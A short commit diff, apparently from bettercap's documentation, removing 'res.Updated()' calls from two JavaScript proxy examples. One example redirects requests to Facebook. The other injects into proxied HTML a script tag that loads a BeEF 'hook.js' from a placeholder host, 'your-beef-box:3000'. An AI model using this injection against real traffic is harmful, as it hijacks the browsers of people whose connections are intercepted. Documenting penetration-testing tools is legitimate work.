This commit is contained in:
evilsocket 2018-02-08 12:34:18 +01:00
commit 22760e12b2

View file

@ -276,7 +276,6 @@ function onRequest(req, res) {
res.Status = 301;
res.Headers = "Location: https://www.facebook.com/\n" +
"Connection: close";
res.Updated()
}
}
```
@ -316,7 +315,6 @@ function onResponse(req, res) {
'</head>',
'<script type="text/javascript" src="http://your-beef-box:3000/hook.js"></script></head>'
);
res.Updated();
}
}
}